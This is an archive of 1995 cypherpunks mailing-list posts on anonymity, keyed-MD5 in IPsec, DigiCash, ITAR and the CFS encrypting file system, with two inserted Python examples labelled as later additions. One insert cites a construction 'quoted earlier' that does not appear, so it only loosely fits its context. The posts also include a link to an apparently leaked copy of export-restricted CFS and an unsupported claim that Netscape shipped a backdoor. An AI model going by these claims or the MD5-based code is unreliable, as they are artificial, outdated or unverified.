Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 3 Nov 1995 17:52:17 +0800
To: cypherpunks@toad.com
Subject: Hit-and-Run Anonymous Posts (Re: "Dr." Fred)
Message-ID: <acbcfb6801021004664c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:22 AM 11/1/95, Dr. Frederick B. Cohen wrote:

(quoting an anonymous poster)

>> The difference, of course, is that it's almost impossible
>> to have sympathy for Dr. Fred. His hustle is for a hell
>> of a lot more than subsistence. He was also never actually
>> a master of his field, a fact that becomes increasingly
>> obvious as our exposure to him goes on. Now he's reduced
>> himself to trying to collect someone else's winnings.
>
>Sour grapes, and from an anonymous poster too.  Oooo - I'm insulted.
>
>I have been thinking about the issues of anonymity for some time, and I
>have been convinced for some time that you can't have both integrity and
>anonymity.  I thought there might be ways to accomplish this, but the
>cypherpunks have convinced me it isn't true.  Show some integrity and
>tell us who you are.

I've also found that anonymous persons are usually the most prone to
hit-and-run attacks and flames. I usually only briefly scan anonymous posts
and then delete them. Some people hide behind anonymity to launch
scurrilous attacks. Best to just ignore them, in my opinion.

Exceptions are the cases when an anonymous source has something "sensitive"
to contribute, such as the release of the putative MD4 code, and the like.

And there have of course been thoughtful anonymous essays.

Anonymity is under some assault today. I think it important not to throw
out the very basic advantages of allowing anonymity just because some abuse
occurs. (The issue is not that "allowing" it is good, but that "banning" it
would require drastic and draconian enforcement measures.)

Pseudonyms are another matter entirely. Some are classy (Pr0duct Cypher,
Black Unicorn, Lucky Green), some are oafish (S Boxx), some are ephemeral.
Persistence of the identity, as when backed by digital signatures, is
important. (Though not essential, yet.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 2 Nov 1995 11:43:17 +0800
To: cypherpunks@toad.com
Subject: Hit-and-Run Anonymous Posts (Re: "Dr." Fred)
Message-ID: <acbcfdc702021004f4bd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Before someone corrects me:

I wrote:

"Exceptions are the cases when an anonymous source has something
"sensitive" to contribute, such as the release of the putative MD4 code,
and the like."

MD or RC4, I forget which it was. My point is that anonymity has been used
to post stuff like this (putatively), and that this is a "good" use of
anonymity. Good in the sense of being non-flamish, non-infantile.

(Not everyone thinks using anonymous posts to "liberate" intellectual
property is a "good" thing, but then I'm sure a lot of people don't think
it's good that the secrets of how to fix plumbing are written up in books
for all to read.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 2 Nov 1995 01:06:05 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Perfect Forward Secrecy - is it worth it?
In-Reply-To: <Pine.SOL.3.91.951031141506.1151H-100000@chivalry>
Message-ID: <199511011619.LAA01986@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero writes:
> Quick survey; how important is perfect forward secrecy to you?

Very. It makes one's life far easier. It makes protecting historical
traffic easy. It's a wonderful feature for a cryptosystem.

> In general, schemes offering PFS require a extra PK-op, and an extra 
> round-trip when compared to  non-PFS schemes. This cost is incurred once 
> per "session", but can add on the order of seconds to startup times. 

Well, things aren't that bad if you use elliptic curve variants on D-H,
or if you are very careful. See Phil Karn's work on this for Photuris...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Thu, 2 Nov 1995 10:59:04 +0800
To: cypherpunks@toad.com
Subject: Re: [FRED] Anonymity and Integrity
In-Reply-To: <199511011907.OAA16631@opine.cs.umass.edu>
Message-ID: <199511011930.LAA28734@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> My turn to rise to the bait...
> 
> Dr. Frederick B. Cohen writes:
> > I have been thinking about the issues of anonymity for some time, and I
> > have been convinced for some time that you can't have both integrity and
> > anonymity.  
> 
> What's your working definition of "integrity" in this context ?

Come on.. we're never gonna get Dr. Fred to go away if we keep giving
him attention.

Christopher





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@amanda.dorsai.org>
Date: Thu, 2 Nov 1995 02:29:09 +0800
To: John Gilmore <gnu@toad.com>
Subject: Re: [ADMIN] Re: Welcome to cypherpunks
In-Reply-To: <9510260118.AA07260@toad.com>
Message-ID: <Pine.SUN.3.91.951101122248.25318F-100000@amanda.dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Oct 1995, John Gilmore wrote:

> It's true, for a period of about 45 minutes today, someone subscribed
> the Cypherpunks list to itself.  This resulted in a small number of
> looped messages.
> 
> Also in today's bogus news, a rather testy newbie, Arthur Germain,
> subscribed at 8AM Tuesday.  He had unsubscribed by 3PM Tuesday, but
> when he got another twenty or thirty messages (that had been sent to
> cypherpunks while he was a subscriber, but which hadn't reached him
> yet), he forwarded each of them back to the mailing list.  You may or
> may not have seen some of these; I killed off further distribution.

Perhaps we can prevent this sort of thing by putting a signature in each 
message as majordomo sends it, say some X-Majordomo-Sent-Already header 
line?  Then when majordomo reads an incoming message it would look for 
that text in both the header and the body, and upon finding it, would 
discard the message.

This would work because removing such a line in order to get majordomo to 
choke would mean either writing code, or doing it manually.  If 
cypherpunks is subscribed to itself, it's easy for majordomo to not 
accept cypherpunks@toad.com as a subscriber.  But if someone forwards a 
message or many back to the list, they'd vanish.

One of the nicer things about FidoNet (perhaps the only one) is that once 
a system receives a message, it adds a signature in the hidden area 
called "seen by" with its node number.  If Majordomo did that, it would 
know it sent that message already...

Not much of a fix, but a nice-to-do kind of fix. :-)


==========================================================================
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. |   _ |>
  \|/  |sunder@dorsai.org| Where day by day, yet another   |   \ |
<--+-->|                 | Constitutional right vanishes.  |    \|
  /|\  |    Just Say     |                                 |    <|\
 + v + | "No" to the NSA!| Jail the censor, not the author!|    <| n
==========================================================================
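
The loop guard proposed in the post above, as an added example (not part of the original post and not Majordomo's own code). The header name and list address come from the thread; the function names and the sample messages are constructed, and the body check is narrowed here to the marker appearing as a header line (optionally behind `>` quoting) so that a post which merely mentions the header in prose is not discarded.

```python
import email
import re
from email import policy

LIST_ADDRESS = "cypherpunks@toad.com"   # list address from the thread
MARKER = "X-Majordomo-Sent-Already"     # header name proposed in the post

# The marker as a header line, optionally behind "> " quoting, so that a
# forwarded copy with its old headers pasted into the body is still caught.
MARKER_LINE = re.compile(r"^[>\s]*" + re.escape(MARKER) + r"\s*:", re.I | re.M)


def may_subscribe(address):
    """Refuse to subscribe the list to itself (the 45-minute loop)."""
    return address.strip().lower() != LIST_ADDRESS


def already_distributed(raw):
    """True if the message carries the marker in its headers or its body."""
    msg = email.message_from_string(raw, policy=policy.default)
    if msg[MARKER] is not None:
        return True
    for part in msg.walk():
        if part.get_content_maintype() == "text":
            if MARKER_LINE.search(part.get_content()):
                return True
    return False


def distribute(raw):
    """Return the stamped copy to send to subscribers, or None to discard."""
    if already_distributed(raw):
        return None
    msg = email.message_from_string(raw, policy=policy.default)
    msg[MARKER] = LIST_ADDRESS          # the "seen by" stamp
    return msg.as_string()


def forward_of(stamped, sender):
    """Constructed sample: a subscriber bouncing a list message back."""
    return (f"From: {sender}\nTo: {LIST_ADDRESS}\nSubject: Fwd\n\n"
            "----- Forwarded message -----\n" + stamped)


# Constructed sample messages.
FRESH = ("From: alice@example.com\nTo: cypherpunks@toad.com\n"
         "Subject: hello\n\nFirst post.\n")
DISCUSSION = ("From: bob@example.com\nTo: cypherpunks@toad.com\n"
              "Subject: loops\n\nPerhaps majordomo could add some "
              "X-Majordomo-Sent-Already header line?\n")

if __name__ == "__main__":
    sent = distribute(FRESH)
    print("fresh post distributed:", sent is not None)
    print("same copy resubmitted :", distribute(sent))
    print("forwarded back to list:", distribute(forward_of(sent, "newbie@example.com")))
    print("post about the header :", distribute(DISCUSSION) is not None)
```

Matching the bare header name anywhere in the body, as the post literally words it, would also discard any message that discusses the header, which is why the check above anchors on the header-line form.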





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Thu, 2 Nov 1995 08:15:16 +0800
To: perry@piermont.com
Subject: Re: Keyed-MD5, and HTTP-NG
Message-ID: <9510018152.AA815258328@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry,
        I personally spoke to Bill Simpson about this problem.  I should have
given you a phone call or email in addition to speaking to Bill.  In my
opinion this problem does not at all reflect on your skills or reputation.
What it signifies to me is the poor state of cryptographic engineering.
If anything, it points out the wisdom of the IPsec designers in requiring
that key material have a limited lifetime.  A wise engineering choice like
this protects the system against many different kinds of attacks.  Of course,
the protocol implementors often omit "details" like key lifetime limits.
In fact, 17 years ago when I wrote a TCP/IP stack for the Xerox Alto I left
out several "details", which of course caused lots of problems when I
did interoperability testing with a mainframe (Multics).
                --Bob


______________________________ Reply Separator _________________________________

On 11/1/95 10:20 AM, perry@piermont.com wrote:

> There were two names on the MD5 document -- mine and Bill
> Simpson's. Bill didn't tell me that he was called (I suspect he 
> would have), and I wasn't called, either. We were the only two 
> editors of that portion of the specification.
> 
> Given that my name was on that document and that I made a large effort to 
> try to make sure that people examined the algorithms and thought they were 
> good, and that I have some of my reputation tied to that document, I am 
> rather unhappy at the fact that I only find out third hand about what people 
> in the field have determined about our selected algorithm.
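
An added example, not part of any post in this thread and not the IPsec specification's or RSA's code: the nested construction quoted earlier in the thread, X = MD5(key1, MD5(key2, Message)), wrapped in an authenticator that enforces the key lifetime limit the message above says implementors tend to omit. Reading "MD5(key, x)" as MD5 over the concatenation key || x is an assumption, as are the class name, the seconds-and-bytes form of the lifetime, and the sample keys and messages.

```python
import hashlib
import hmac
import time


class KeyExpired(Exception):
    """Raised when the key pair has outlived its configured lifetime."""


def nested_keyed_md5(key1, key2, message):
    """X = MD5(key1 || MD5(key2 || message)); concatenation is assumed."""
    inner = hashlib.md5(key2 + message).digest()
    return hashlib.md5(key1 + inner).digest()


class LimitedLifetimeAuthenticator:
    """Tags and verifies messages until a time or volume limit is reached.

    Both limits are hard stops: once either is hit, every call raises
    KeyExpired and the caller has to negotiate fresh key material.
    """

    def __init__(self, key1, key2, max_seconds, max_bytes, clock=time.monotonic):
        self._key1 = key1
        self._key2 = key2
        self._max_seconds = max_seconds
        self._max_bytes = max_bytes
        self._clock = clock
        self._created = clock()
        self._bytes_used = 0

    def _charge(self, nbytes):
        # Check before doing any work so an expired key is never used.
        if self._clock() - self._created >= self._max_seconds:
            raise KeyExpired("time limit reached")
        if self._bytes_used + nbytes > self._max_bytes:
            raise KeyExpired("byte limit reached")
        self._bytes_used += nbytes

    def tag(self, message):
        self._charge(len(message))
        return nested_keyed_md5(self._key1, self._key2, message)

    def verify(self, message, tag):
        # Verification also consumes lifetime: it is a use of the key.
        self._charge(len(message))
        expected = nested_keyed_md5(self._key1, self._key2, message)
        return hmac.compare_digest(expected, tag)   # constant-time compare


if __name__ == "__main__":
    # Constructed sample keys and message.
    auth = LimitedLifetimeAuthenticator(b"k1" * 8, b"k2" * 8,
                                        max_seconds=3600, max_bytes=64)
    msg = b"pay 10 to bob"
    t = auth.tag(msg)
    print("tag       :", t.hex())
    print("verifies  :", auth.verify(msg, t))
    print("tampered  :", auth.verify(b"pay 90 to bob", t))
    try:
        auth.tag(b"x" * 30)             # 39 bytes used so far, 30 more exceeds 64
    except KeyExpired as exc:
        print("refused   :", exc)
```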






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zuhn@sctc.com (david d `zoo' zuhn)
Date: Thu, 2 Nov 1995 11:18:36 +0800
To: cypherpunks@toad.com
Subject: D.C. (and other?) C'punx at C.S.I. show?
Message-ID: <v02130500acbd640d015c@[172.17.1.134]>
MIME-Version: 1.0
Content-Type: text/plain


I'm going to be in D.C. for the CSI show next week (Nov 5-8), and would be
interested in getting together (dinner, beer, whatever) with other folks
interested in cypherpunkish things.  If a number of you respond, I'll try
to coordinate some sort of group event if at all possible.

Send me mail, give me a call, or stop by booth 111.


--
david d `zoo' zuhn  --  secure computing corporation  --  zuhn@sctc.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Thu, 2 Nov 1995 10:16:45 +0800
To: Mixmaster Mailing List <cypherpunks@toad.com
Subject: Birds of a Feather...
Message-ID: <Pine.BSD.3.91.951101130010.807B-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone!

	Some of us are going to USENIX in January. If you want to discuss 
like interests for this event, I've opened #remailop on IRC on DALnet. 
Need a server? irc.phoenix.net.. See ya there!!

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG@WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 2 Nov 1995 12:17:49 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: ecash remailer
In-Reply-To: <199510311940.OAA31415@opine.cs.umass.edu>
Message-ID: <Pine.SUN.3.91.951101130302.2576B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Now I am fully confused.

I thought a property of Chaumian DigiCash was that a coin *had* to go back
to the bank before it could be spent again.  Yet all "coin exchange"
schemes discussed here recently involve Alice paying Bob who then sends
the coin to Carol's Exchange who then sends it to the bank while sending
some other value, maybe a Carol coin, to Bob. 

Logically, I can see at least four possibilities:

1) payee data is encoded onto the coin at time of payment, making it 
impossible for Carol to bank the coin.  I see no evidence of this in the 
docs at the Digicash site, but I just rechecked quickly and may have 
missed it.

2) No payee data as such is encoded on the coin but it is marked "spent" 
to prevent multiple uses by payee to the detriment of payor.  ditto on 
the evidence.

3) the Digicash software only allows you to send a "spent" coin to the 
bank.  You have to hack the software to send the coin to Carol (do you 
have to break your own key?).

4) nothing in the DigiCash software or protocol prevents you from sending 
a coin to Carol so long as you trust Carol not to get you in trouble by 
misusing the coin in some way.  That's why Chaum is interested in 
hardware based agents that would keep you from respending coins you receive.

No doubt there are others.  Anyone know what the reality is?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 2 Nov 1995 12:10:21 +0800
To: "baldwin" (Robert W. Baldwin) <baldwin@rsa.com>
Subject: Re: Keyed-MD5, and HTTP-NG
In-Reply-To: <9510018152.AA815244951@snail.rsa.com>
Message-ID: <199511011820.NAA02107@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"baldwin" writes:
>         I also understand your being upset about not hearing about this
> attack the moment it was published.  Actually, as soon as RSA Labs confirmed
> the weakness we did call some of the editors of the IPsec specifications
> to let them know about it.  The consensus was that this was not a show
> stopper.

There were two names on the MD5 document -- mine and Bill
Simpson's. Bill didn't tell me that he was called (I suspect he would
have), and I wasn't called, either. We were the only two editors of
that portion of the specification.

Given that my name was on that document and that I made a large effort
to try to make sure that people examined the algorithms and thought
they were good, and that I have some of my reputation tied to that
document, I am rather unhappy at the fact that I only find out third
hand about what people in the field have determined about our selected
algorithm.

> The IPsec protocols could be rolled out as is.  Later, once a
> better authenticator had been developed and tested, it could be
> substituted for the existing one.  One of the excellent features of the
> IPsec specification is that new algorithms can be substituted easily
> (modulo a "small matter of programming").

I know. I was one of the designers. We all understood extremely well
that crypto algorithms become rapidly obsolete. However, we needed to
specify a reasonably strong baseline transform that would be widely
deployed. I was shocked at the level of trouble we had in getting the
cryptoweenies to successfully agree on a keyed hash based transform no
matter how long was spent on the topic. I've got to say that my
opinion of the academic crypto community dropped substantially after
the experience. I would have thought that people could at least have
agreed on what they knew and didn't know.  This was strikingly
different from my experience with other mathematical fields, in which
the experts seem to agree pretty readily about what is and isn't
known.

>         Perhaps your main complaint is that it took time for the attack
> to be confirmed by other researchers before the issue was brought to
> the IPsec authors.  That is another effect of the current state of the
> art in Cryptography, and an effect of the normal academic process.

People might have noted their suspicions to us. As engineers, we are
capable of avoiding something based on suspected weakness without
solid confirmation -- we aren't trying to publish papers, we are
trying to get things to work.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 17:54:46 +0800
To: cypherpunks@toad.com
Subject: Re: IBM's Microkernal
In-Reply-To: <199511011817.TAA17785@utopia.hacktic.nl>
Message-ID: <199511011832.NAA02128@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> 
> Responding to msg by perry@piermont.com ("Perry E. Metzger") on 
> Wed, 01 Nov 11:51 AM
> 
> >Why is this being sent to cypherpunks? It's totally 
> >irrelevant.
> 
> 
> It's related to IBM's work on machine/code interface security, 
> encryption and authentication capabilities.

No it isn't. It's just an operating system microkernel. These typically
just provide very low level process abstractions to allow device
drivers and operating system interfaces to be built as processes. It
has nothing WHATSOEVER to do with cryptography.

I realize that the word "code" appeared in the article, but just
because the word "code" gets used doesn't mean we are talking about
cryptography.

By the way, learn how to spell "kernel".

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 2 Nov 1995 09:44:50 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [FRED] Anonymity and Integrity
In-Reply-To: <9511011022.AA08641@all.net>
Message-ID: <199511011907.OAA16631@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


My turn to rise to the bait...

Dr. Frederick B. Cohen writes:
> I have been thinking about the issues of anonymity for some time, and I
> have been convinced for some time that you can't have both integrity and
> anonymity.  

What's your working definition of "integrity" in this context ?

-Futplex <futplex@pseudonym.com>
"Once anonymous, twice pseudonymous"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 2 Nov 1995 08:42:04 +0800
To: cypherpunks@toad.com
Subject: Re: The cost of ITAR
Message-ID: <199511012336.PAA16268@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> Here's the problem:  Because the US government has outlawed the export of
> industrial-strength encryption, firms seeking to do business abroad find 
> themselves without trustworthy security options once they leave US 
> boundaries.  How can companies in the information and networking 
> business, such as Sun Microsystems, possibly sell a system to Alcatel in 
> France, for example, if the encryption that accompanies it can be broken 
> by a 14-year-old with too much time on his or her hands?  They can't.  So 
> Sun came up with a novel solution: buy Russian.  The Soviets may have 
> sucked at cars and strip malls, but they sure as hell knew their 
> cryptography.  "The Russians can make any kind of encryption you want" 
> says Geoffrey Baehr chief network officer at Sun.  And what can the US 
> government do about a product developed outside its borders?  Nothing.

Actually the US government and US industry generally does not follow any
coherent industrial development policy of which ITAR is but one single
part. There is almost a jingoistic belief in the "free market"  with a
concomitant commitment to a strong American individualism.  While this
may function domestically, it certainly does not function internationally. 

The US continues to cede entire industries through poor economic and trade
policy.  I guess, nothing was learned with Boeing and Airbus. 

ITAR regulations will simply lock-out US companies from foreign markets,
and this combined with "competition" rather than "co-operation" will allow
foreign firms to divide and conquer American firms.  Foreigners generally
don't trust "American" as it is. 

Historically, the US has deliberately sold inferior security products
while making representations that they were in fact secure.  While this
*might* work on unsuspecting civilians, internationally it just doesn't
pass the giggle test, and won't allow a US firm to even make the bid list 
outside their own borders in the not too distant future.

US companies will lose the entire international market, unless they begin
to think globally.  Non-legislated trade lockouts based on Nationalism are
extremely difficult to overcome. 

> In fact, Sun was so taken with Russia's computing talent that the company 
> recently hired the entire team once responsible for the next generation 
> of Soviet supercomputers (and the Russians brought along the plans for 
> the beasts).  Ask Sun chief scientist John Gage if he'd rely on 
> US-approved encryption to send those plans between Moscow and California, 
> and he'll laugh out loud.  "We can't rely on that stuff.  We're talking 
> trade secrets here!" - John Battelle

While John Gage may laugh out loud, it is actually a very serious matter.
Trade secrets are not for laughter.  

As an example, what value is access to Pacific Gas's LAN??  Let's suppose
that Pacific Gas could be compromised because of poor security or
encryption -- a compromise which occurs as a result of some user
installing a commercial web-browser which had a well-known "back door", a
browser like the Netscape product. 

What would be the fallout from this??

Maybe (domestically), Pacific Gas customers might not be _happy_ that
PGT's market book was given over to CAPP, and that foreign producers knew
*exactly* what Californian's Natural Gas open interest was in advance on a
real time basis.  And that CAPP, hypothetically, has used and continues to
use that information in trading on Natural Gas markets, which results in
all Californians paying a 30% premium on their utility bills. 

Would this be a laughing matter??  

Who would laugh if natural gas prices were up (as they in fact are) 
25 - 30% at the trading hub AECO-C? 

And while PGT might ignore daisy chaining, and advance the argument that
the hole was at NGX -- rather than at PGT, or maybe that the hole was
because a client of NGX installed a copy of Navigator 1.1 somewhere, how
far would the laughter carry??  Especially the laughter at the keystone
cop finger pointing?? 

Around the world, maybe?

The idea of a foreign group of producers positioning themselves through
high-tech scouting by taking advantage of the shoddy design of a "Made in
America" product so that they could indirectly tax the citizens of
California is _truly_ a laughing matter.  Trivial in fact.

The uproar of a class action suit by all the customers of PGT would be but
a small nuisance within the context of the international fallout.  

Laughter will not be on the lips of US executives when it becomes known
that the security flaw in Navigator 1.1 was "well and widely known" within
the US software, hardware and security industry, and that ALL members 
of kept quiet about and around it. 

There will be little laughter at the catastrophic trade fallout if it is
demonstrable (as it was) that a US multi-billion dollar company knowingly
distributed a program which functions as a virus delivery vehicle, and
that all US industry members decided that their "industrial policy" 
dictated that they would not step forward and speak out. 

There will be very little laughter amongst shareholders and directors 
when they become aware that not only were entire markets sacrificed to 
"keep the secret" but that the entire US economy was put at risk.
 
Good-bye international markets -- not just for the said billion dollar 
company -- but for all members of the industry who domicile in the US.  

> This looks like a striking example of regulatory arbitrage at work, and 
> if it can be confirmed in its details ought to be an extremely powerful 
> anecdote in the hands of those working against GAK and ITAR.
>
> The sucking sound is American jobs heading overseas, 
> the snorting sound is American trade-secrets being sniffed up 
>     by foreign competitors, 

Yep, and it's not even a question of someone else causing this.  This is 
US citizens, and US companies having a limited experience and view in 
international trade, and that very inexperience leading to their OWN 
creation of these problems.  Has anyone considered GISA in all of this?
Probably not.

As an example, I contacted AT&T, regarding the Netscape flaw which was
posted to the Internet on Friday the Thirteenth -- the flaw that Netscape
had "no comment" on.  I asked for AT&T commentary, since they were selling
the Netscape product under their own brand.  I also asked for referral to
their Security Officer, rather than their Public Relations people. 

AT&T's response??

    "...I am not sure that our security officers are up to it.  Often 
    AT&T just repackages an external product, without opening it or 
    understanding it.  My guess is that the corporation is likely to 
    simply trust the netscape folks unless an actual hole can be  
    demonstrated."

And with that, there's 'nuff said ...

> Maybe the FBI's responsibility for US counter-intelligence is meant as a 
> double-entendre?

I guess getting shot by friendly fire does sound better than saying that
you're shooting yourself in the foot.  Don't it?? 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 1 Nov 1995 23:30:55 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511011445.PAA13294@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Oct 1995, Anonymous wrote:

> Wall Street Journal, October 30, 1995, p. B3.

> Brad Meinert, senior analyst at research firm Input, says the
> tremendous growth of the World Wide Web, a graphics Internet
> interface, "is putting increased capacity demands for greater
> bandwidth on the Internet infrastructure."

I see our media friends are just as clueful as ever .... graphics 
Internet interface ??  That's almost as bad as saying "Come visit our 
Internet Site" when they mean Web site !!













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andreas Bogk <andreas@artcom.de>
Date: Sun, 5 Nov 1995 22:35:17 +0800
To: cypherpunks@toad.com
Subject: Re: New release of CFS Unix encrypting file system available
In-Reply-To: <9510271856.AA24314@merckx.info.att.com>
Message-ID: <m0tAfXb-0002duC@horten>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Matt" == Matt Blaze <mab@research.att.com> writes:

    Matt> Source code for the latest version (release 1.3.1) of CFS,
    Matt> the Cryptographic File System, is now available upon request
    Matt> for research and experimental use in the US and Canada.

Please report any leakage of this software immediately to this list.

Andreas

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMJeY2EyjTSyISdw9AQFD7AP/SghCAohL5yJP6kgwz2W45zuexFkh1gQO
s32CaBQqTEGLir7S5llYd53Eiof/y6JDCEDao9B45Tcz8IKtW2YhPbAOrRLS1dnp
G8GTRL31R/LtqUaKcn/VqgV+sa6dwMWtelPnrYoFhtS5mxmBXP00nCca+PWfw8kt
EadgTZtIYyc=
=PgXu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Thu, 2 Nov 1995 07:31:40 +0800
To: cypherpunks@toad.com
Subject: Re: US government department for crime enforcement!
In-Reply-To: <199511011440.GAA23008@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9511011736.B46528-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 1 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> It's come to my attention that the US government has a group
> called the 'Department of the Treasury Financial Crimes 
> Enforcement Network' in Vienna, Virginia.
> 
Yeah, in case you're interested, Anon, Wired had an article on them,
I think in 1.2, the cypherpunks issue. It might also be in their privacy 
archive. Fincen has webpages at 
www.ustreas.gov/treasury/bureaus/fincen/fincen.html

The agency is pretty much an alternative to the IRS's crumbling computers
and a nice cover for possibly unapproved interagency cooperation.
Look up some recent posts by Douglas Barnes on a banking conference.

Sorry to repeat what's been said here a zillion times before.

This account is a remailer for bad terminal servers. The above opinions are 
entirely the result of line noise. @#$#@$~%?!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Thu, 2 Nov 1995 02:22:38 +0800
To: Andreas Bogk <andreas@artcom.de>
Subject: Re: New release of CFS...
In-Reply-To: <m0tAfXb-0002duC@horten>
Message-ID: <Pine.HPP.3.91.951101180307.29374A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Andreas Bogk wrote:

> Please report any leakage of this software immediately to this list.

Try ftp://utopia.hacktic.nl/pub/replay/crypto/CRYPTOapps/cfs.1.3.tar.gz

Mats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 2 Nov 1995 22:15:24 +0800
To: cypherpunks@toad.com
Subject: Re: US government department for crime enforcement!
Message-ID: <199511012333.SAA15819@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Still, anonymous does make an astutely ironic observation, in 
humorous lifting of the customary FinCEN cloak:


That the hydra-headed agency may literally aim at financial 
*crimes* enforcement rather than enforcement of the laws 
against such deeds.


Especially given the participating renegade agencies who seem 
to absolve themselves of these laws.


Perhaps anonymous is right, they are a band of outlaws, daring 
to overtly flaunt it, expecting no opposition from the gullible 
cowed.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 2 Nov 1995 11:36:46 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: ecash remailer
Message-ID: <199511020239.SAA27491@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:20 PM 11/1/95 -0500, Michael Froomkin <froomkin@law.miami.edu> wrote:
>I thought a property of Chaumian DigiCash was that a coin *had* to go back
>to the bank before it could be spent again.  

No.  The basic Chaum Digicash method looks like this:
1) Alice creates a number of a recognizable form (Chaum's 1985 CACM paper
uses n1n2n3...n64n1n2n3....n64, i.e. a 64-bit number concatenated with itself).
2) Alice blinds the number and sends it to the bank (along with some request
for withdrawing money from her account or payment in other coin or whatever.)
3) The bank signs the number and sends it back.
